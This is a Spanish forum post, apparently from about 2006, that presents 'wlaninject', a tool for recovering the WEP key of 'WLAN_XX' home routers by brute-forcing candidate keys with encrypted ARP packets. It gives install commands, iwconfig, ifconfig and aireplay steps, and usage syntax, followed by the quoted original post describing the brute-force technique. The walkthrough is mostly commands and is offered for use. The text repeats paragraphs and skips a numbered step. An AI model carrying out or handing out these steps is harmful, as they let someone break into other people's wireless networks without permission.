El tiempo estimado del ataque son unos 4 minutos pero en condiciones optimas de señal se puede hacer en menos.
Página oficial: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/64
Instalación
Lo bajamos y en una consola situada en el directorio de bajada tecleamos:
Código:
tar -zxvf wlaninject-?.?.tar.gz
cd wlaninject-?.?
make
make install
El ejecutable se copia a /usr/local/sbin
Modo de uso
1) Nos conectamos a la red a descifrar con una contraseña cualquiera. Y nos ponemos una ip dentro del rango 192.168.1.0/24:
Código:
iwconfig {INTERFAZ} channel {CANAL}
iwconfig {INTERFAZ} essid {NOMBRE_DE_LA_RED}
iwconfig {INTERFAZ} ap {MAC_DE_LA_RED}
iwconfig {INTERFAZ} key s:AAAAAAAAAAAAA
ifconfig {INTERFAZ} 192.168.1.250 up <--- ESTE ES IFCONFIG CON EFE !!
Código:
iwlist {INTERFAZ} rate <--- Al ejecutarlo nos dirá las velocidades que acepta la red y nuestra tarjeta, apuntamos la más grande (ej. 36M)
iwconfig {INTERFAZ} rate {VELOCIDAD} <--- Aqui obligamos a que la conexión sea a la máxima velocidad disponible
Código:
iwconfig {INTERFAZ} rate 1M
Código:
aireplay -4 -b {BSSID} -f1 {INTERFAZ}
3) Ejecutar wlaninject con la siguiente sintaxis:
Código:
wlaninject 0.? - (c) 2006 nilp0inter2k6_at_gmail.com
------------> http://www.rusoblanco.com <------------
[i] modo de uso: wlaninject < -b BSSID > < -e ESSID > < -i INTERFAZ >
-b BSSID
-e ESSID
-i INTERFAZ
Ejemplo:
Para una red con ESSID=\"WLAN_35\" y BSSID= \"00:60:B3:XX:XX:XX\" ejecutariamos:
Código:
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0
El paquete se habrá guardado con un nombre parecido a este: replay_arp-XXXX-XXXXXX.cap.
Muchas gracias a axi por arreglar mis cagadas con libnet xD
Saludos y que lo disfruteis.
TODO:
- Añadir función para que pare de enviar si se desconecta. HECHO
- Función para el cálculo de rate. HECHO (Hay que mejorarlo)
- Comprobar que la conexión es correcta y la ip esta dentro del rango
- Reescribir todo el código. ES UNA CHAPUZA!!
Post original
Citar
Hola, se me ha ocurrido hoy una idea y quería preguntaros que os parece (estareis pensando que que pesado estoy con las WLAN... y vuelta la burra al trigo, no? xD).
Para los que no conozcan comodescifrar descifrar* WLAN_XX sin paquetes y sin clientes os diré que hay un script para linux aqui : http://foro.elhacker.net/index.php/topic,126683.0.html.
Los que ya conoceis esta técnica sabreis que es bastante burra (mandar un arp cifrado con las 65565 posibles claves una tras otra hasta obtener respuesta); lo que se me ha ocurrido es que hay dos posibilidades para hacerlo más rápido (estoy hablando de hacerlo en 3-4 minutos en vez de 20 ó 30 ) :
Este segundo método es sólo teórico, es decir, no se exactamente si se puede hacer tal y como digo... pero me parece una buena idea.
Quería preguntaros a los máquinas de esto que si os parece buena idea y si lo veis factible.
Bueno ¿Qué me decis? Si veis que me rayo me lo borrais xD y aqui santas pascuas.
* Como lei el otro dia en una web muy interesante descifrar es sacar algo de una cripta xD... mejor descifrar
Para los que no conozcan como
Los que ya conoceis esta técnica sabreis que es bastante burra (mandar un arp cifrado con las 65565 posibles claves una tras otra hasta obtener respuesta); lo que se me ha ocurrido es que hay dos posibilidades para hacerlo más rápido (estoy hablando de hacerlo en 3-4 minutos en vez de 20 ó 30 ) :
- El mismo método implementado en C: Con lo que ganaría mucha velocidad ya que no tendría que llamar a iwconfig cada vez que quiere cambiar la clave y a arping2 cada vez que quiere enviar un paquete arp, etc; usariamos directamente la api y sockets.
- Usar el siguiente método tambien en C: En vez de hacer un bucle que cambie la key y llame a la rutina de enviar un arp podríamos generar un arp, y copiarlo a un fichero en memoria 65565 veces cifrado con cada una de las claves y luego enviarlos por el interfaz raw que tienen las atheros directamente con los que nos quitariamos estar cambiando la clave todo el rato.
Este segundo método es sólo teórico, es decir, no se exactamente si se puede hacer tal y como digo... pero me parece una buena idea.
Quería preguntaros a los máquinas de esto que si os parece buena idea y si lo veis factible.
Bueno ¿Qué me decis? Si veis que me rayo me lo borrais xD y aqui santas pascuas.
* Como lei el otro dia en una web muy interesante descifrar es sacar algo de una cripta xD... mejor descifrar